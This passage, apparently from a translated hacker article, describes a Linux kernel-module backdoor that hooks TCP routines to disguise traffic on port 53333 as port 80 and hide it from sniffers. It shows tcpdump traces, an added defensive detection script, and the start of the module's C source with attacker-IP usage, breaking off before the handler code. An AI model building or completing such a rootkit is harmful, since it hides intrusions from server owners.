1. Replacing protocol routines to alter outgoing packets. In the Linux kernel, every BSD socket is actually a socket/sock pair of kernel structures. The packet-sending routine is reached through the tcp_opt* member of the sock structure, which in turn uses its af_specific member. Interestingly, all IPv4 sockets share the same address here: every af_specific points to the same kernel address, a structure that holds a set of routines. How do we modify the function addresses in this "tcp_func" instance?
The method is simple, but implementing it is not so easy, because there is no straightforward way to obtain the address of that structure. One possible approach: walk the process list (the chain of task structures) to find the files each process has open; among those files find the ones that actually point to a socket; from the socket obtain the sock structure; and finally obtain the address of "ipv4_specific".
Laid out as a chain, the path described above is: task -> files_struct -> file -> inode -> socket -> sock -> tcp_opt -> tcp_func.
The other methods are more difficult and more dangerous. The idea comes from [6]: search kernel memory for the exact function address we want, then patch kernel memory so that execution first jumps to the address of our code and then jumps back to the regular routine.
2. Sniffing the traffic from the web server and from a network workstation.
In this section, mamet is a server on which our backdoor has been installed and leone is the attacker's machine.
The first tcpdump output records the traffic as seen from a network workstation other than mamet. We can see that it looks normal: a conversation between port 2603 on leone and port 80 on mamet:

14:16:27.214888 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: S 3840116896:3840116896(0) win 32120 <mss 1460,sackOK,timestamp 14616818 0,nop,wscale 0> (DF)
14:16:27.215190 eth0 < mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: S 3561828491:3561828491(0) ack 3840116897 win 32120 <mss 1460,sackOK,timestamp 1547802 14616818,nop,wscale 0> (DF)
14:16:27.215336 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: . 1:1(0) ack 1 win 32120 <nop,nop,timestamp 14616819 1547802> (DF)
14:16:27.313396 eth0 < mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P 1:39(38) ack 1 win 32120 <nop,nop,timestamp 1547812 14616819> (DF)
14:16:27.313539 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: . 1:1(0) ack 39 win 32120 <nop,nop,timestamp 14616828 1547812> (DF)
14:16:30.166613 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: P 1:6(5) ack 39 win 32120 <nop,nop,timestamp 14617114 1547812> (DF)
14:16:30.166895 eth0 < mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: . 39:39(0) ack 6 win 32120 <nop,nop,timestamp 1548097 14617114> (DF)
14:16:30.190287 eth0 < mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P 39:127(88) ack 6 win 32120 <nop,nop,timestamp 1548099 14617114> (DF)
14:16:30.205280 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: . 6:6(0) ack 127 win 32120 <nop,nop,timestamp 14617118 1548099> (DF)
14:16:30.205548 eth0 < mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P 127:157(30) ack 6 win 32120 <nop,nop,timestamp 1548101 14617118> (DF)
14:16:30.225281 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: . 6:6(0) ack 157 win 32120 <nop,nop,timestamp 14617120 1548101> (DF)
14:16:35.664222 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: P 6:17(11) ack 157 win 32120 <nop,nop,timestamp 14617663 1548101> (DF)
14:16:35.676943 eth0 < mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P 157:236(79) ack 17 win 32120 <nop,nop,timestamp 1548648 14617663> (DF)
14:16:35.695279 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: . 17:17(0) ack 236 win 32120 <nop,nop,timestamp 14617667 1548648> (DF)
14:16:35.695561 eth0 < mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P 236:266(30) ack 17 win 32120 <nop,nop,timestamp 1548650 14617667> (DF)
14:16:35.715282 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: . 17:17(0) ack 266 win 32120 <nop,nop,timestamp 14617669 1548650> (DF)
14:16:40.099813 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: P 17:23(6) ack 266 win 32120 <nop,nop,timestamp 14618107 1548650> (DF)
14:16:40.103771 eth0 < mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P 266:300(34) ack 23 win 32120 <nop,nop,timestamp 1549091 14618107> (DF)
14:16:40.115282 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: . 23:23(0) ack 300 win 32120 <nop,nop,timestamp 14618109 1549091> (DF)
14:16:42.196173 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: P 23:30(7) ack 300 win 32120 <nop,nop,timestamp 14618317 1549091> (DF)
14:16:42.199260 eth0 < mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: F 300:300(0) ack 30 win 32120 <nop,nop,timestamp 1549300 14618317> (DF)
14:16:42.199399 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: . 30:30(0) ack 301 win 32120 <nop,nop,timestamp 14618317 1549300> (DF)
14:16:42.199806 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: F 30:30(0) ack 301 win 32120 <nop,nop,timestamp 14618317 1549300> (DF)
14:16:42.200052 eth0 < mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: . 301:301(0) ack 31 win 32120 <nop,nop,timestamp 1549300 14618317> (DF)

Here is the trace of the same session collected on the server itself. It looks rather odd: port 2603 on leone appears to be talking to port 53333 on mamet. Some of these packets look foreign; they are in fact the ones that have been modified.

14:12:16.042692 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: S 3840116896:3840116896(0) win 32120 <mss 1460,sackOK,timestamp 14616818 0,nop,wscale 0> (DF)
14:12:16.042844 eth0 > mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: S 3561828491:3561828491(0) ack 3840116897 win 32120 <mss 1460,sackOK,timestamp 1547802 14616818,nop,wscale 0> (DF)
14:12:16.043136 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: . 3840116897:3840116897(0) ack 3561828492 win 32120 <nop,nop,timestamp 14616819 1547802> (DF)
14:12:16.141022 eth0 > mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P 1:39(38) ack 1 win 32120 <nop,nop,timestamp 1547812 14616819> (DF)
14:12:16.141340 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: . 0:0(0) ack 39 win 32120 <nop,nop,timestamp 14616828 1547812> (DF)
14:12:18.994434 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: P 0:5(5) ack 39 win 32120 <nop,nop,timestamp 14617114 1547812> (DF)
14:12:18.994567 eth0 > mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: . 39:39(0) ack 6 win 32120 <nop,nop,timestamp 1548097 14617114> (DF)
14:12:19.017933 eth0 > mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P 39:127(88) ack 6 win 32120 <nop,nop,timestamp 1548099 14617114> (DF)
14:12:19.033100 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: . 5:5(0) ack 127 win 32120 <nop,nop,timestamp 14617118 1548099> (DF)
14:12:19.033222 eth0 > mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P 127:157(30) ack 6 win 32120 <nop,nop,timestamp 1548101 14617118> (DF)
14:12:19.053099 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: . 5:5(0) ack 157 win 32120 <nop,nop,timestamp 14617120 1548101> (DF)
14:12:24.492064 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: P 5:16(11) ack 157 win 32120 <nop,nop,timestamp 14617663 1548101> (DF)
14:12:24.504619 eth0 > mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P 157:236(79) ack 17 win 32120 <nop,nop,timestamp 1548648 14617663> (DF)
14:12:24.523115 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: . 16:16(0) ack 236 win 32120 <nop,nop,timestamp 14617667 1548648> (DF)
14:12:24.523259 eth0 > mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P 236:266(30) ack 17 win 32120 <nop,nop,timestamp 1548650 14617667> (DF)
14:12:24.543124 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: . 16:16(0) ack 266 win 32120 <nop,nop,timestamp 14617669 1548650> (DF)
14:12:28.927675 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: P 16:22(6) ack 266 win 32120 <nop,nop,timestamp 14618107 1548650> (DF)
14:12:28.931467 eth0 > mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P 266:300(34) ack 23 win 32120 <nop,nop,timestamp 1549091 14618107> (DF)
14:12:28.943147 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: . 22:22(0) ack 300 win 32120 <nop,nop,timestamp 14618109 1549091> (DF)
14:12:31.024044 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: P 22:29(7) ack 300 win 32120 <nop,nop,timestamp 14618317 1549091> (DF)
14:12:31.026978 eth0 > mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: F 300:300(0) ack 30 win 32120 <nop,nop,timestamp 1549300 14618317> (DF)
14:12:31.027268 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: . 29:29(0) ack 301 win 32120 <nop,nop,timestamp 14618317 1549300> (DF)
14:12:31.027669 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: F 29:29(0) ack 301 win 32120 <nop,nop,timestamp 14618317 1549300> (DF)
14:12:31.027780 eth0 > mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: . 301:301(0) ack 31 win 32120 <nop,nop,timestamp 1549300 14618317> (DF)
If you are creative enough, you can even make the sniffer unable to sniff your traffic at all. In this example, a sniffer running on mamet would not be able to see the network connection coming from leone.
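The two traces above differ only in the port numbers of the packets arriving at mamet, while the TCP timestamp options, flags and host names are identical in both views. A defender can use exactly that to detect this kind of port-rewriting kernel hook: capture the same session from the host and from a separate network tap, correlate packets on the fields the hook leaves untouched, and flag any pair whose ports disagree. The script below is an added example, not code from the original article; its sample input is three packets copied from the traces above, and the detector works for any tcpdump lines in this format that carry a timestamp option.

```python
import re
from collections import namedtuple

# Shape of one tcpdump line as printed in the traces above:
#   <time> <iface> <dir> <src>.<port> > <dst>.<port>: <flags> ... <...,timestamp TSval TSecr,...> (DF)
LINE_RE = re.compile(
    r"^\S+ \S+ [<>] (?P<src>\S+) > (?P<dst>\S+): (?P<flags>\S+) "
    r".*?timestamp (?P<tsval>\d+) (?P<tsecr>\d+)"
)
Pkt = namedtuple("Pkt", "src_host src_port dst_host dst_port flags tsval tsecr")

def parse(line):
    """Return a Pkt, or None for lines without a TCP timestamp option (they cannot be correlated)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    src_host, src_port = m["src"].rsplit(".", 1)  # host names contain dots; the port is the last field
    dst_host, dst_port = m["dst"].rsplit(".", 1)
    return Pkt(src_host, src_port, dst_host, dst_port, m["flags"], int(m["tsval"]), int(m["tsecr"]))

def port_mismatches(wire_lines, host_lines):
    """Correlate the two captures on fields the port rewrite leaves untouched (flags, TSval,
    TSecr, host names) and return every packet whose ports differ between the two views.
    Capture wall-clock times are deliberately ignored: the two clocks above differ by minutes."""
    def key(p):
        return (p.flags, p.tsval, p.tsecr, p.src_host, p.dst_host)
    on_host = {key(p): p for p in map(parse, host_lines) if p}
    findings = []
    for w in filter(None, map(parse, wire_lines)):
        h = on_host.get(key(w))
        if h and (w.src_port, w.dst_port) != (h.src_port, h.dst_port):
            findings.append((w.src_host, w.dst_host, (w.src_port, w.dst_port), (h.src_port, h.dst_port)))
    return findings

# Constructed sample: three packets of the session above, first as the workstation saw them, then as mamet did.
WIRE = [
    "14:16:27.214888 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: S 3840116896:3840116896(0) win 32120 <mss 1460,sackOK,timestamp 14616818 0,nop,wscale 0> (DF)",
    "14:16:27.215190 eth0 < mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: S 3561828491:3561828491(0) ack 3840116897 win 32120 <mss 1460,sackOK,timestamp 1547802 14616818,nop,wscale 0> (DF)",
    "14:16:30.166613 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: P 1:6(5) ack 39 win 32120 <nop,nop,timestamp 14617114 1547812> (DF)",
]
HOST = [
    "14:12:16.042692 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: S 3840116896:3840116896(0) win 32120 <mss 1460,sackOK,timestamp 14616818 0,nop,wscale 0> (DF)",
    "14:12:16.042844 eth0 > mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: S 3561828491:3561828491(0) ack 3840116897 win 32120 <mss 1460,sackOK,timestamp 1547802 14616818,nop,wscale 0> (DF)",
    "14:12:18.994434 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: P 0:5(5) ack 39 win 32120 <nop,nop,timestamp 14617114 1547812> (DF)",
]

if __name__ == "__main__":
    for src, dst, wire_ports, host_ports in port_mismatches(WIRE, HOST):
        print(f"{src} -> {dst}: on the wire {wire_ports}, on the host {host_ports}")
```

On the sample the two inbound packets are reported (port www on the wire, 53333 on the host) while mamet's reply, whose ports match in both views, is not.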
3. File "test.c"
/*
 * Compile:
 *   gcc -O2 -c test.c -I/usr/src/linux/include -fomit-frame-pointer
 *
 * Usage:
 *   insmod test.o ip=128.111.48.44
 * here ip is the attacker's IP and must be in numeric format
 */

#define MODULE
#define __KERNEL__

#include <linux/config.h>
#include <linux/module.h>
#include <linux/version.h>
#include <linux/skbuff.h>

#include <net/protocol.h>
#include <linux/netdevice.h>
#include <net/pkt_sched.h>
#include <net/tcp.h>
#include <net/ip.h>
#include <linux/if_ether.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <linux/icmp.h>
#include <linux/firewall.h>

#include <linux/kernel.h>
#include <linux/mm.h>
#include <linux/file.h>
#include <asm/uaccess.h>

/* Define here if you want to swap ports also */
#define REALPORT 53333 /* port you wish to communicate on */
#define FAKEPORT 80    /* port that appears on the wire */

int my_tcp_v4_rcv(struct sk_buff *skb, unsigned short len);
__u32 in_aton(const char *);
int my_default_firewall(struct firewall_ops *this, int pf, struct device *dev,
                        void *phdr, void *arg, struct sk_buff **skb);
int my_call_out_firewall(struct firewall_ops *this, int pf, struct device *dev,
                         void *phdr, void *arg, struct sk_buff **skb);

unsigned long int magic_ip;
char *ip;
MODULE_PARM(ip, "s");
struct inet_protocol *original_tcp_protocol;

struct inet_protocol my_tcp_protocol = {
    &my_tcp_v4_rcv,  /* handler     */
    NULL,            /* err_handler */
    NULL,            /* next        */
    IPPROTO_TCP,     /* protocol    */
    0,               /* copy        */
    NULL,            /* data        */
    "TCP"            /* name        */
};

/*
 * <linux/firewall.h>
 *
 *  18 struct firewall_ops
 *  19 {
 *  20     struct firewall_ops *next;
 *  21     int (*fw_forward)(struct firewall_ops *this, int pf,
 *  22         struct device *dev, void *phdr, void *arg, struct sk_buff **pskb);
 *  23     int (*fw_input)(struct firewall_ops *this, int pf,
 *  24         struct device *dev, void *phdr, void *arg, struct sk_buff **pskb);
 *  25     int (*fw_output)(struct firewall_ops *this, int pf,
 *  26         struct device *dev, void *phdr, void *arg, struct sk_buff **pskb);
 *  27     / * Data falling in the second 486 cache line isn't used directly
 *  28      * during a firewall call and scan, only by insert/delete and other
 *  29      * unusual cases
 *  30      * /
 *  31     int fw_pf;        / * Protocol family * /
 *  32     int fw_priority;  / * Priority of chosen firewalls * /
 *  33 };
 */